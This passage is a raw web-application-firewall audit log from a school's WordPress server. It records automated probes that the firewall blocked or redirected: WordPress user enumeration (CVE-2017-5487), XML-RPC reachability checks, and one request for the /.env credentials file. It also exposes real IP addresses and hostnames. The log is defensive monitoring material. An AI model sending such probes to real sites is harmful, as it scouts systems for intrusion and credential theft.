[client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446471567173 3400 (- - -) Stopwatch2: 1747446471567173 3400; combined=1478, p1=488, p2=956, p3=0, p4=0, p5=33, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --557b995a-Z-- --f9852d7d-A-- [17/May/2025:08:47:57 +0700] aCfqzQTOsBn9MSWb6WJu0QAAAJY 103.236.140.4 44474 103.236.140.4 8181 --f9852d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9852d7d-C-- demo.sayHello --f9852d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9852d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446477397822 5264 (- - -) Stopwatch2: 1747446477397822 5264; combined=3577, p1=488, p2=2907, p3=32, p4=34, p5=70, sr=58, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9852d7d-Z-- --bb065f6f-A-- [17/May/2025:08:48:59 +0700] aCfrCwTOsBn9MSWb6WJu0wAAAJg 103.236.140.4 44482 103.236.140.4 8181 --bb065f6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb065f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb065f6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446539500855 2396 (- - -) Stopwatch2: 1747446539500855 2396; combined=1118, p1=361, p2=725, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb065f6f-Z-- --f0eb0e0e-A-- [17/May/2025:08:49:05 +0700] aCfrEQTOsBn9MSWb6WJu1QAAAIM 103.236.140.4 44486 103.236.140.4 8181 --f0eb0e0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f0eb0e0e-C-- demo.sayHello --f0eb0e0e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0eb0e0e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446545795732 5711 (- - -) Stopwatch2: 1747446545795732 5711; combined=4172, p1=549, p2=3399, p3=32, p4=36, p5=93, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0eb0e0e-Z-- --e9d03160-A-- [17/May/2025:08:49:18 +0700] aCfrHgTOsBn9MSWb6WJu1wAAAIY 103.236.140.4 44492 103.236.140.4 8181 --e9d03160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9d03160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9d03160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446558570601 3253 (- - -) Stopwatch2: 1747446558570601 3253; combined=1428, p1=490, p2=905, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9d03160-Z-- --e80fc90b-A-- [17/May/2025:08:49:24 +0700] aCfrJOm4kjNN-hEbWjJBVQAAAEc 103.236.140.4 44496 103.236.140.4 8181 --e80fc90b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e80fc90b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80fc90b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446564665232 2816 (- - -) Stopwatch2: 1747446564665232 2816; combined=1241, p1=428, p2=783, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80fc90b-Z-- --ff552009-A-- [17/May/2025:08:49:24 +0700] aCfrJATOsBn9MSWb6WJu2QAAAIc 103.236.140.4 44498 103.236.140.4 8181 --ff552009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.138 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff552009-C-- demo.sayHello --ff552009-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff552009-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446564969444 4965 (- - -) Stopwatch2: 1747446564969444 4965; combined=3911, p1=435, p2=3259, p3=32, p4=36, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff552009-Z-- --d3191f7f-A-- [17/May/2025:08:49:30 +0700] aCfrKgTOsBn9MSWb6WJu2wAAAIk 103.236.140.4 44504 103.236.140.4 8181 --d3191f7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3191f7f-C-- demo.sayHello --d3191f7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3191f7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446570694249 6698 (- - -) Stopwatch2: 1747446570694249 6698; combined=4779, p1=608, p2=3988, p3=33, p4=34, p5=69, sr=81, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3191f7f-Z-- --4d3bb306-A-- [17/May/2025:08:50:22 +0700] aCfrXgTOsBn9MSWb6WJu3QAAAIo 103.236.140.4 44510 103.236.140.4 8181 --4d3bb306-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446622438853 3231 (- - -) Stopwatch2: 1747446622438853 3231; combined=1428, p1=501, p2=895, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --e3808525-A-- [17/May/2025:08:50:28 +0700] aCfrZATOsBn9MSWb6WJu3wAAAJA 103.236.140.4 44514 103.236.140.4 8181 --e3808525-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3808525-C-- demo.sayHello --e3808525-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3808525-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446628260143 2820 (- - -) Stopwatch2: 1747446628260143 2820; combined=2165, p1=278, p2=1765, p3=14, p4=14, p5=55, sr=52, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3808525-Z-- --8b2d765a-A-- [17/May/2025:08:50:45 +0700] aCfrdQTOsBn9MSWb6WJu4AAAAI8 103.236.140.4 44518 103.236.140.4 8181 --8b2d765a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b2d765a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446645481173 3030 (- - -) Stopwatch2: 1747446645481173 3030; combined=1296, p1=437, p2=824, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --b7163877-A-- [17/May/2025:08:50:53 +0700] aCfrfRKi5m5upc8uMd6iRQAAANM 103.236.140.4 44522 103.236.140.4 8181 --b7163877-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b7163877-C-- demo.sayHello --b7163877-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7163877-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446653204382 4697 (- - -) Stopwatch2: 1747446653204382 4697; combined=3619, p1=444, p2=2977, p3=23, p4=25, p5=88, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7163877-Z-- --e0700a73-A-- [17/May/2025:08:52:19 +0700] aCfr03yxdQCiyU1ENFcn7wAAAAY 103.236.140.4 44536 103.236.140.4 8181 --e0700a73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0700a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0700a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446739511297 3348 (- - -) Stopwatch2: 1747446739511297 3348; combined=1462, p1=473, p2=956, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0700a73-Z-- --70977b50-A-- [17/May/2025:08:52:26 +0700] aCfr2gTOsBn9MSWb6WJu5gAAAIM 103.236.140.4 44540 103.236.140.4 8181 --70977b50-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 37.187.139.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 37.187.139.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0 Safari/537.36 Accept: */* --70977b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70977b50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747446746383183 745 (- - -) Stopwatch2: 1747446746383183 745; combined=309, p1=271, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70977b50-Z-- --d7a46366-A-- [17/May/2025:08:52:30 +0700] aCfr3um4kjNN-hEbWjJBWQAAAE4 103.236.140.4 44546 103.236.140.4 8181 --d7a46366-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d7a46366-C-- demo.sayHello --d7a46366-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7a46366-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446750786679 6408 (- - -) Stopwatch2: 1747446750786679 6408; combined=4663, p1=617, p2=3805, p3=38, p4=42, p5=97, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7a46366-Z-- --0bb3917f-A-- [17/May/2025:08:53:56 +0700] aCfsNHyxdQCiyU1ENFcn8QAAAAo 103.236.140.4 44568 103.236.140.4 8181 --0bb3917f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0bb3917f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bb3917f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446836372557 3335 (- - -) Stopwatch2: 1747446836372557 3335; combined=1453, p1=490, p2=931, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bb3917f-Z-- --58ae7d04-A-- [17/May/2025:08:53:59 +0700] aCfsNxKi5m5upc8uMd6iSgAAAMI 103.236.140.4 44572 103.236.140.4 8181 --58ae7d04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58ae7d04-C-- demo.sayHello --58ae7d04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ae7d04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446839618587 5677 (- - -) Stopwatch2: 1747446839618587 5677; combined=4128, p1=596, p2=3313, p3=29, p4=31, p5=93, sr=131, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ae7d04-Z-- --4d3bb306-A-- [17/May/2025:08:55:55 +0700] aCfsq-m4kjNN-hEbWjJBXQAAAFg 103.236.140.4 44622 103.236.140.4 8181 --4d3bb306-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 